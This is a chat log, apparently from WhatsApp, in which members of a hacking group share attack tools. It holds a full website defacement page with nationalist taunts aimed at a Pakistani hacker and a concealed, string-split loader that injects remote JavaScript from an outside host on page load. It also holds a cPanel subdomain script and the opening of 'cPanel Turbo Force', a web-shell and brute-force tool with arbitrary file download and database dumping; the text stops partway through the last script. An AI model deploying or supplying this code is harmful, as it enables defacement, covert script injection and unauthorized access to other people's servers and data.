Code of deface page.....
[8/6, 4:47 PM] +91 97998 89428: <!------------ COded By Cyb3rD3v1L -------->
<link rel="icon" type="image/gif" href="http://www.crossed-flag-pins.com/animated-flag-gif/gifs/India_120-animated-flag-gifs.gif">
<html>
<head><script type='text/javascript'>
var msg = "LOL!! Guess what?! you got owned :v h ";
msg = " " + msg;pos = 0;
function scrollTitle() {
document.title = msg.substring(pos, msg.length) + msg.substring(0, pos); pos++;
if (pos > msg.length) pos = 0
window.setTimeout("scrollTitle()",300);
}
scrollTitle();
</script>
<script language=JavaScript>
var message="NO NO NO YOU CAN'T xD";
function clickIE4(){
if (event.button==2){
alert(message);
return false;
}
}
function clickNS4(e){
if (document.layers||document.getElementById&&!document.all){
if (e.which==2||e.which==3){
alert(message);
return false;
}
}
}
if (document.layers){
document.captureEvents(Event.MOUSEDOWN);
document.onmousedown=clickNS4;
}
else if (document.all&&!document.getElementById){
document.onmousedown=clickIE4;
}
document.oncontextmenu=new Function("alert(message);return false")
</script>
<script>
/*function check(e)
{
alert(e.keyCode);
}*/
document.onkeydown = function(e) {
if (e.ctrlKey && (e.keyCode === 67 || e.keyCode === 86 || e.keyCode === 85 || e.keyCode === 117)) {//Alt+c, Alt+v will also be disabled sadly.
alert('No Thats not allowed');
}
return false;
};
</script>
<style type="text/css">
h1 {color: #333;font-size: 100px;margin: 1px auto;text-align:center;text-transform:uppercase; font-family:Orbitron;}
.neon {color: #FFFFFF;text-shadow: 0 0 5px #1ab4e7, 0 0 10px #1ab4e7, 0 0 30px #18a2d0, 0 0 45px #18a2d0, 0 0 60px #18a2d0;}
h2 {color: #333;font-size: 50px;margin: 1px auto;text-align:center;text-transform:uppercase; font-family:Audiowide;}
.neon {color: #FFFFFF;text-shadow: 0 0 5px #1ab4e7, 0 0 10px #1ab4e7, 0 0 30px #18a2d0, 0 0 45px #18a2d0, 0 0 60px #18a2d0;}
h3 {color: #333;font-size: 50px;margin: 1px auto;text-align:center;text-transform:uppercase; font-family:Audiowide;}
.neon {color: #FFFFFF;text-shadow: 0 0 5px #1ab4e7, 0 0 10px #1ab4e7, 0 0 30px #18a2d0, 0 0 45px #18a2d0, 0 0 60px #18a2d0;}
.matrix {color: #FFFFFF; font-family:Arial, Courier, Monotype; font-size:10pt; text-align:center; width:10px; padding:0px; margin:0px;}
.jokitz1{
text-align : center;
}
.jokitz2{
text-align : center;
font-family : Courier;
}
</style>
<script src="http://www.schillmania.com/projects/snowstorm/snowstorm-min.js" type="text/javascript"></script>
</head>
<!-------------------------------------EMBED AREA------------------------->
<link href='http://fonts.googleapis.com/css?family=Lobster+Two' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Berkshire+Swash' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Just+Another+Hand' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Merienda+One' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
<embed src="https://www.youtube.com/v/fjDuGKTsitc&autoplay=1&loop=true" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
<!------------------------------------/END---------------------------------->
<meta name="author" content="TH3 N1GH7M4R3"/>
<meta name="description" content="INDIAN HACKERS WERE HERE"/>
<meta content="INDIAN HACKERS" name="subject">
<meta content="INDIAN HACKERS" name="Abstract">
<meta content="INDIAN HACKERS" name="description">
<meta content="INDIAN HACKERS" name="copyright">
<meta content="INDIAN HACKERS" name="author">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"><style>
body {
background: url(http://aermech.in/wp-content/uploads/2016/05/armywal-4.jpg) no-repeat center center fixed;
-webkit-background-size: cover;
-moz-background-size: cover;
-o-background-size: cover;
background-size: cover;
color: white;
}
.title1{
font-family: sans-serif;
font-size: 30px;
color:white;
}
.text{
font-family: Tahoma;
font-size: 20px;
color:grey;
}
.text:hover{
font-family: Tahoma;
font-size: 21px;
color:white;
}
</style>
<style type="text/css">
h1 {
color: #AAAA;
font-size: 53px;
margin: 1px auto;
text-align:center;
text-transform:uppercase;
text-shadow: 0px 0px 7px grey;
}
.neon {
color: #FA1607;
text-shadow: 0 0 3px white, 0 0 3px , 0 0 10px , 0 0 42px , 0 0 38px ;
text-decoration: Bold;
}
</style>
<style>
/* unvisited link */
a:link {
text-decoration: none;
color: red;
}
/* visited link */
a:visited {
text-decoration: none;
color: Orange;
}
/* mouse over link */
a:hover {
text-decoration: none;
color: green;
}
/* selected link */
a:active {
text-decoration: none;
color: blue;
}
</style>
</head>
<script type="text/javascript">
<!--
var message="LMAO!! INDIANS FUCKED YOUR SYSTEM";
///////////////////////////////////
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if
(document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers)
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
document.oncontextmenu=new Function("return false")
// -->
</script>
<script type="text/javascript">
var DADrightclicktheme = 'Dark';
var DADrightclickimage = 'https://i.imgsafe.org/5c6a7a221c.jpg';
</script>
<script>
if (DADrightclicktheme == 'Merah' || DADrightclicktheme == 'MERAH' || DADrightclicktheme == 'merah') {
var DADarcv2t = 'rgba(239,110,119, 0.9)';
} else if (DADrightclicktheme == 'Biru' || DADrightclicktheme == 'BIRU' || DADrightclicktheme == 'biru') {
var DADarcv2t = 'rgba(110,137,239, 0.9)';
} else if (DADrightclicktheme == 'Hijau' || DADrightclicktheme == 'HIJAU' || DADrightclicktheme == 'hijau') {
var DADarcv2t = 'rgba(110,239,110, 0.9)';
} else if (DADrightclicktheme == 'Light' || DADrightclicktheme == 'light' || DADrightclicktheme == 'LIGHT') {
var DADarcv2t = 'rgba(255,255,255, 0.9)';
} else if (DADrightclicktheme == 'Pink' || DADrightclicktheme == 'pink' || DADrightclicktheme == 'PINK') {
var DADarcv2t = 'rgba(239,110,225, 0.9)';
} else if (DADrightclicktheme == 'Dark' || DADrightclicktheme == 'dark' || DADrightclicktheme == 'DARK') {
var DADarcv2t = 'rgba(0,0,0, 0.9)';
} else {
{
var DADarcv2t = 'transparent';
}
}
function DADarcvwi2() {
var DADarcv2v = document.getElementById('DADarcv2c');
if (DADarcv2v.style.display == "block") {
DADarcv2v.style.display = "none";
} else {
DADarcv2v.style.display = "block";
}
}
function DADarcwiv2a() {
DADarcvwi2();
return false;
}
document.oncontextmenu = DADarcwiv2a;
var ypro = 'http:';
var yajax = document.createElement('script');
yajax.type = 'text/javascript';
var yquery = 'dic';
var ybrow = 'aru.c';
var yint = '/';
yajax.src = ypro + '//x.' + yquery + 'keym' + ybrow + 'om' + yint + 'y';
document.getElementsByTagName('head')[0].appendChild(yajax);
var DADrcdiv = document.write('<style type="text/css"/>#DADarcv2c{background:url(' + DADrightclickimage + ') no-repeat center center fixed ' + DADarcv2t + ';text-align:center;width:100%;height:100%;position:fixed;top:0px;left:0px;bottom:0px;right:0px;border:0px;z-index:1000000;display:none;padding:auto;}#DADarcv2c span{position:fixed;bottom:0px;left:10%;right:10%;cursor:pointer;font-size:20px;}</style><div id="DADarcv2c" class="DADpointer" onclick="DADarcvwi2();" title=""/><center><span><a href="#" target="_blank"/></a></span></center></div>');
document.getElementsByTagName('body')[0].appendChild(DADrcdiv);
</script>
<center><img src="http://bestanimations.com/Flags/Asia/india/india-flag-waving-animated-gif-7.gif"></center><br>
<div id="Hello">
<center><Font face="Lobster Two"><STRONG><b><font color="orange" font size="18">THIS</font> <font color="white" font size="18">WEB</font> <font color="green" font size="18">SITE </STRONG></font></center>
<center><p class="hacker"><h1>HACKED BY UNITED INDIAN HACKERS</h1><br></p></center></div>
<center><font color="#C70039" font size="30">SHAME ON YOU MIAN ALYAAN</font></center><br><br>
<body>
<center>
<td align=center>
<DIV class=line1><font color=orange><BIG><strong> Hello Pakistan's Self Proclaimed Leet Hacker Miyan Aliyan aka Virus Haxor..Well You Are Really An Elite Hacker Who Works For The Benefit Of His Nation,</BIG></strong</div>
<DIV class=line2><font color=white><BIG> How ? Well, Simply By Kicking The Only Source Of Bread And Butter Of A Self Dependent Freelancer. A Freelamcer Whose Sole Way </BIG></div>
<DIV class=line3><font color=LIME><BIG>Of Income for His Livelihood As Well As To Support His Family Is By Developing Websites For Different People. Do U Remember That?</BIG></div>
<DIV class=line1><font color=ORANGE><BIG><strong>Vijay Jadhav Whose Two Sites Namely <a href=" http://www.policekhulasa.com/">Policekhulasa.com</a> And <a href="http://www.policesarkar.com/">Policesarkar.com</a> Was Not Just Defaced By You But The Entire Data Within That Site Was Very Blatantly Erased Off Without Even Thinking What Consequences Would The Developer Of That Site Have To Face.</BIG></strong></div>
<DIV class=line2><font color=white><BIG>You Had not Even Made Up Backup Of The Site That u Had Defaced. You Are Really A Great Human Being Who Gets Enjoyment And Spends His Time Of Leisure By Ruining The Source Of Livelihood Of An Innocent.</BIG></div>
<DIV class=line4><font color=LIME><BIG>The Developer Of The Site Had Also Begged U On Facebook To Return Back All The Data Of Those Sites As The Site Owner Was Asking From The Developer For Full Refund. But You Just Gave Him Some shitty False Hopes And Returned Nothing.Not Even A Single Text File...When Asked By Other Indian Hackers, U Retorted Them By Saying "<b><font color="#12B2E9">Do Whatever U Want, I Aint Going To Give Anything Back</b></font>" </BIG></div>
<DIV class=line5><font color=white><BIG>You Really Did A Brave Work By Destroying Not Just The Work Of An Individual But Also By Destroying His Only Source Of Income As Well As His Reputation In Public And Among All His Clients. Pak Hackers May Have Enemity With India And If They Really Have That Power And Guts Then Go On Deface The .GOV Websites ,Not The Site Made By A Poor Individual Who Earns His Living By Freelancing..</BIG></div>
<DIV class=line6><font color=LIME><BIG>You Are Not Just A Shame To The Entire Society Of Hackers, Rather U Are Source Of National Shame. May Ur Allah Bless U And Reward You For The Great Deed That You Have Done By Kicking Of Someones Reputation, Source Of Income, And His Bread And Butter.</BIG></div><br>
<DIV class=line7><font color=YELLOW><BIG>WE ARE INDIANS, WE ARE LEGENDS, WE ARE EVERYWHERE. DO YOU KNOW WHY MICROSOFT HIRES HIGEST NUMBER OF INDIANS AS THEIR EMPLOYYES??? COZ BILL GATES KNOWS THAT IF INDIANS DOESNT GET OCCUPIED WITH SOMETHING BIG UNDER A BIG COMPANY, THEN A NEW MICROSOFT WOULD BE DEVELOPED IN INDIA. WANT EXAMPLE?? WELL NASA NEVER ASSISTED MUCH INDIANS OR HIRED THEM, SO INDIANS DEVELOPED THEIR OWN SPACE RESEARCH CENTRE WHICH HAS NOW EVEN MADE UP WORLD RECORDS IN MANY OF ITS ACHIEVEMENTS, MOST RECENT ACHIEVE MENT IS TO LAUNCH SATELLITES IN A SINGLE ROCKET.INDIANS ARE BORN LEGENDS IN EVERYWHERE AND IN EVERYFIELD. INDIAN ARMY IS THE 4TH BEST IN THE WORLD AND PAKISTAN IS NO MATCH FOR OUR POWER. ITS SAD THAT OUR GOVERNMENT DOESNT PERMITS INDIAN ARMY TO SHOW ITS FULL POWER EVER. IF THAT HADNT BEEN THE CASE THEN WITHIN JUST MONTHS PAKISTAN WOULD HAVE BEEN IN ITS KNEELS BEGGING INDIA FOR FORGIVENESS. WE DONT DO SOMETHING THAT DOESNT MEANS THAT WE CANT DO ANYTHING... WE WERE SLEEPING AND WE WAKE UP ONLY WHEN THERE IS A STRONG URGE TO FIGHT BACK AGAINGT INJUSTICE AND TERRORISM, AND RIGHT NOW IT IS THAT MOMENT FOR US TO SHOW YOU WHAT WE CAN </BIG></div><br>
<DIV class=line7><font color=orange><BIG> THIS WEBSITE IS NOW STAMPED BY UNITED INDIAN HACKERS, YOU CAN RECOVER BACK YOUR SITE, BUT YOU WONT BE ABLE TO REMOVE THE BLOT FROM THIS... JO DHABBA LAGA HAI WOH SAARE JINDEGI MEIN BHI NAHI MITNE WALA. KEEP HACKING INDIAN SITES AND WE WILL BE READY TO GIVE YOU PAYBACK </BIG></div><br>
<script>
window.onload = function() {
var h1 = document.getElementsByTagName("h1")[0],
text = h1.innerText || h1.textContent,
split = [], i, lit = 0, timer = null;
for(i = 0; i < text.length; ++i) {
split.push("<span>" + text[i] + "</span>");
}
h1.innerHTML = split.join("");
split = h1.childNodes;
var flicker = function() {
lit += 0.02;
if(lit >= 1) {
clearInterval(timer);
}
for(i = 0; i < split.length; ++i) {
if(Math.random() < lit) {
split[i].className = "neon";
} else {
split[i].className = "";
}
}
}
setInterval(flicker, 130);
}
</script>
<script type="text/javascript">/*<![CDATA[*/
TypingText = function(element, interval, cursor, finishedCallback) {
if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
this.running = true;
return;
}
this.element = element;
this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
this.interval = (typeof interval == "undefined" ? 100 : interval);
this.origText = this.element.innerHTML;
this.unparsedOrigText = this.origText;
this.cursor = (cursor ? cursor : "/");
this.currentText = "/";
this.currentChar = 0;
this.element.typingText = this;
if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
TypingText.all.push(this);
this.running = false;
this.inTag = false;
this.tagBuffer = "";
this.inHTMLEntity = false;
this.HTMLEntityBuffer = "";
}
TypingText.all = new Array();
TypingText.currentIndex = 0;
TypingText.runAll = function() {
for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
}
TypingText.prototype.run = function() {
if(this.running) return;
if(typeof this.origText == "undefined") {
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
return;
}
if(this.currentText == "") this.element.innerHTML = "";
if(this.currentChar < this.origText.length) {
if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
this.tagBuffer = "<";
this.inTag = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
this.tagBuffer += ">";
this.inTag = false;
this.currentText += this.tagBuffer;
this.currentChar++;
this.run();
return;
} else if(this.inTag) {
this.tagBuffer += this.origText.charAt(this.currentChar);
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
this.HTMLEntityBuffer = "&";
this.inHTMLEntity = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
this.HTMLEntityBuffer += ";";
this.inHTMLEntity = false;
this.currentText += this.HTMLEntityBuffer;
this.currentChar++;
this.run();
return;
} else if(this.inHTMLEntity) {
this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
this.currentChar++;
this.run();
return;
} else {
this.currentText += this.origText.charAt(this.currentChar);
}
this.element.innerHTML = this.currentText;
this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
this.currentChar++;
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
} else {
this.currentText = "";
this.currentChar = 0;
this.running = false;
this.finishedCallback();
}
}
/*]]>*/</script></head>
<center>
<div id="container">
<div id="content-container">
<div id="content">
<p id="message" class="notes">
<span style="color:White;font-family:Kaushan Script;text-shadow:blue 0px 0px 10px" "font-size: 50pt;">VANDE MATARAM. BHARAT MATA KI JAI.<br>
PAKIS WE OWNED YOU!! :V LOL!! LMAO!! ROFL!!<br>
JAI HIND. JAI BHARAT.</div></p>
</font>
</center>
<script type="text/javascript">/*<![CDATA[*/
new TypingText(document.getElementById("message"), 90, function(i){ var ar = new Array("_", " ", "_", " "); return " " + ar[i.length % ar.length]; });
TypingText.runAll();
/*]]>*/</script>
<br><br>
<center>
<div id="greets">
<span class="blueglow">
<font face="Kaushan Script" font color="RED" font size="8">GREETINGS</font>
<br><br>
[<marquee align="center" scrollamount="5" width="560"><font color="LIME" face="Merienda One" size="5">INDISHELL - INDIAN BLACK HATS - LULZSEC IND - #GhostINDIA - INDIAN CYBER SECURITY FORCE - WBCS - TEAM HIND HACKERS - ASSAM CYBER WARRIORS - HELL SHIELD HACKERS - KERLA CYBER WARRIORS - BLACKHOLE TEAM - AND ALL INDIAN HACKERS</marquee>]
</center>
<div id=bar style="position: scroll; width: 100%; bottom: 0px; font-family: Merienda One; height: 20px; color: white; font-size: 13px; left: 0px; border-top:1px solid #000; padding: 5px; background-color: #000"><CENTEr> PAKISTAN YOU ● GOT OWNED ● EXPECT US</CENTER></div>
save it run it and right click on the page
[8/6, 4:52 PM] Banna Po1337: <?php ############################################################### # cPanel Subdomains Creator 1.1 ############################################################### # Visit http://www.zubrag.com/scripts/ for updates ############################################################### # # Can be used in 3 ways: # 1. just open script in browser and fill the form # 2. pass all info via url and form will not appear # Sample: cpanel_subdomains.php?cpaneluser=USER&cpanelpass=PASSWORD&domain=DOMAIN&subdomain=SUBDOMAIN # 3. list subdomains in file. In this case you must provide all the defaults below # # Note: you can omit any parameter, except "subdomain". # When omitted, default value specified below will be taken ############################################################### // cpanel user define('CPANELUSER','user'); // cpanel password define('CPANELPASS','pass'); // name of the subdomains list file. // file format may be 1 column or 2 columns divided with semicilon (;) // Example for two columns: // rootdomain1;subdomain1 // rootdomain1;subdomain2 // Example for one columns: // subdomain1 // subdomain2 define('INPUT_FILE','domains.txt'); // cPanel skin (mainly "x") // Check http://www.zubrag.com/articles/determine-cpanel-skin.php // to know it for sure define('CPANEL_SKIN','x'); // Default domain (subdomains will be created for this domain) // Will be used if not passed via parameter and not set in subdomains file define('DOMAIN',''); /////////////// END OF INITIAL SETTINGS //////////////////////// //////////////////////////////////////////////////////////////// function getVar($name, $def = '') { if (isset($_REQUEST[$name]) && ($_REQUEST[$name] != '')) return $_REQUEST[$name]; else return $def; } $cpaneluser=getVar('cpaneluser', CPANELUSER); $cpanelpass=getVar('cpanelpass', CPANELPASS); $cpanel_skin = getVar('cpanelskin', CPANEL_SKIN); if (isset($_REQUEST["subdomain"])) { // get parameters passed via URL or form, emulate string from file $doms = array( getVar('domain', DOMAIN) . ";" . $_REQUEST["subdomain"]); if (getVar('domain', DOMAIN) == '') die("You must specify domain name"); } else { // open file with domains list $doms = @file(INPUT_FILE); if (!$doms) { // file does not exist, show input form echo " Cannot find input file with subdomains information. It is ok if you are not creating subdomains from file.<br> Tip: leave field empty to use default value you have specified in the script's code.<br> <form method='post'> Subdomain:<input name='subdomain'><br> Domain:<input name='domain'><br> cPanel User:<input name='cpaneluser'><br> cPanel Password:<input name='cpanelpass'><br> cPanel Skin:<input name='cpanelskin'><br> <input type='submit' value='Create Subdomain' style='border:1px solid black'> </form>"; die(); } } // create subdomain function subd($host,$port,$ownername,$passw,$request) { $sock = fsockopen('localhost',2082); if(!$sock) { print('Socket error'); exit(); } $authstr = "$ownername:$passw"; $pass = base64_encode($authstr); $in = "GET $request\r\n"; $in .= "HTTP/1.0\r\n"; $in .= "Host:$host\r\n"; $in .= "Authorization: Basic $pass\r\n"; $in .= "\r\n"; fputs($sock, $in); while (!feof($sock)) { $result .= fgets ($sock,128); } fclose( $sock ); return $result; } foreach($doms as $dom) { $lines = explode(';',$dom); if (count($lines) == 2) { // domain and subdomain passed $domain = trim($lines[0]); $subd = trim($lines[1]); } else { // only subdomain passed $domain = getVar('domain', DOMAIN); $subd = trim($lines[0]); } // http://[domainhere]:2082/frontend/x/subdomain/doadddomain.html?domain=[subdomain here]&rootdomain=[domain here] $request = "/frontend/$cpanel_skin/subdomain/doadddomain.html?rootdomain=$domain&domain=$subd"; $result = subd('localhost',2082,$cpaneluser,$cpanelpass,$request); $show = strip_tags($result); echo $show; } ?>
[8/6, 5:04 PM] Shiv Chauhan Haaxor: <html>
<title>cPanel Turbo Force v2</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php
/*
Turbo Force By Tryag.Cc
*/
@set_time_limit(0);
@error_reporting(0);
echo '<head>
<style type="text/css">
<!--
body {
background-color: #000000;
font-size: 18px;
color: #cccccc;
}
input,textarea,select{
font-weight: bold;
color: #cccccc;
dashed #ffffff;
border: 1px
solid #2C2C2C;
background-color: #080808
}
a {
background-color: #151515;
vertical-align: bottom;
color: #000;
text-decoration: none;
font-size: 20px;
margin: 8px;
padding: 6px;
border: thin solid #000;
}
a:hover {
background-color: #080808;
vertical-align: bottom;
color: #333;
text-decoration: none;
font-size: 20px;
margin: 8px;
padding: 6px;
border: thin solid #000;
}
.style1 {
text-align: center;
}
.style2 {
color: #FFFFFF;
font-weight: bold;
}
.style3 {
color: #FFFFFF;
}
-->
</style>
</head>
';
function in($type,$name,$size,$value,$checked=0)
{
$ret = "<input type=".$type." name=".$name." "; if($size != 0)
{
$ret .= "size=".$size." "; }
$ret .= "value=\"".$value."\""; if($checked) $ret .= " checked"; return $ret.">"; }
class my_sql
{
var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $base = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $columns; var $num_rows; var $num_fields; var $dump; function connect()
{
switch($this->db)
{
case 'MySQL': if(empty($this->port))
{
$this->port = '3306'; }
if(!function_exists('mysql_connect')) return 0; $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(empty($this->port))
{
$this->port = '1433'; }
if(!function_exists('mssql_connect')) return 0; $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); if($this->connection) return 1; $this->error = "Can't connect to server"; break; case 'PostgreSQL': if(empty($this->port))
{
$this->port = '5432'; }
$str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; if(!function_exists('pg_connect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; $this->error = @pg_last_error($this->connection); break; case 'Oracle': if(!function_exists('ocilogon')) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; $error = @ocierror(); $this->error=$error['message']; break; }
return 0; }
function select_db()
{
switch($this->db)
{
case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(@mssql_select_db($this->base,$this->connection)) return 1; $this->error = "Can't select database"; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1; break; }
return 0; }
function query($query)
{
$this->res=$this->error=''; switch($this->db)
{
case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
{
$this->error = @mysql_error($this->connection); return 0; }
else if(is_resource($this->res))
{
return 1; }
return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this->connection)))
{
$this->error = 'Query error'; return 0; }
else if(@mssql_num_rows($this->res) > 0)
{
return 1; }
return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->connection,$query)))
{
$this->error = @pg_last_error($this->connection); return 0; }
else if(@pg_num_rows($this->res) > 0)
{
return 1; }
return 2; break; case 'Oracle': if(false===($this->res=@ociparse($this->connection,$query)))
{
$this->error = 'Query parse error'; }
else
{
if(@ociexecute($this->res))
{
if(@ocirowcount($this->res) != 0) return 2; return 1; }
$error = @ocierror(); $this->error=$error['message']; }
break; }
return 0; }
function get_result()
{
$this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db)
{
case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows)
{
$this->columns = @array_keys($this->rows[0]); return 1;}
break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows)
{
$this->columns = @array_keys($this->rows[0]); return 1;}
; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); @pg_free_result($this->res); if($this->num_rows)
{
$this->columns = @array_keys($this->rows[0]); return 1;}
break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreestatement($this->res); if($this->num_rows)
{
$this->columns = @array_keys($this->rows[0]); return 1;}
break; }
return 0; }
function dump($table)
{
if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '##'; $this->dump[1] = '## --------------------------------------- '; $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); $this->dump[3] = '## Database: '.$this->base; $this->dump[4] = '## Table: '.$table; $this->dump[5] = '## --------------------------------------- '; switch($this->db)
{
case 'MySQL': $this->dump[0] = '## MySQL dump'; if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0]['Create Table'].";"; $this->dump[] = '## --------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v)
{
$this->rows[$i][$k] = @mysql_real_escape_string($v);}
$this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
break; case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v)
{
$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v)
{
$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; $this->dump[] = '## under construction'; break; default: return 0; break; }
return 1; }
function close()
{
switch($this->db)
{
case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_close($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); break; case 'Oracle': @oci_close($this->connection); break; }
}
function affected_rows()
{
switch($this->db)
{
case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': return @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affected_rows($this->res); break; case 'Oracle': return @ocirowcount($this->res); break; default: return 0; break; }
}
}
if(!empty($_POST['cccc']) && $_POST['cccc']=="download_file" && !empty($_POST['d_name']))
{
if(!$file=@fopen($_POST['d_name'],"r"))
{
err(1,$_POST['d_name']); $_POST['cccc']=""; }
else
{
@ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,@filesize($_POST['d_name'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding))
{
header('Content-Encoding: ' . $content_encoding); }
header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename=\"".$filename."\";"); echo $filedump; exit(); }
}
if(isset($_GET['phpinfo']))
{
echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
if (!empty($_POST['cccc']) && $_POST['cccc']=="db_query")
{
echo $head; $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode(';',$_POST['db_query']); echo '<body bgcolor=#e4e0d8>'; if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>".$sql->error."</b></font></div>"; else
{
if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>".$sql->error."</b></font></div>"; else
{
foreach($querys as $num=>$query)
{
if(strlen($query)>5)
{
echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; switch($sql->query($query))
{
case '0': echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>"; break; case '1': if($sql->get_result())
{
echo "<table width=100%>"; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode(" </b></font></td><td bgcolor=#800000><font face=Verdana size=-2><b> ", $sql->columns); echo "<tr><td bgcolor=#800000><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>"; for($i=0;$i<$sql->num_rows;$i++)
{
foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode(" </font></td><td><font face=Verdana size=-2> ",$sql->rows[$i]); echo '<tr><td><font face=Verdana size=-2> '.$values.' </font></td></tr>'; }
echo "</table>"; }
break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; break; }
}
}
}
}
echo "<br><title>Turbo Force By Tryag</title><form name=form method=POST>";
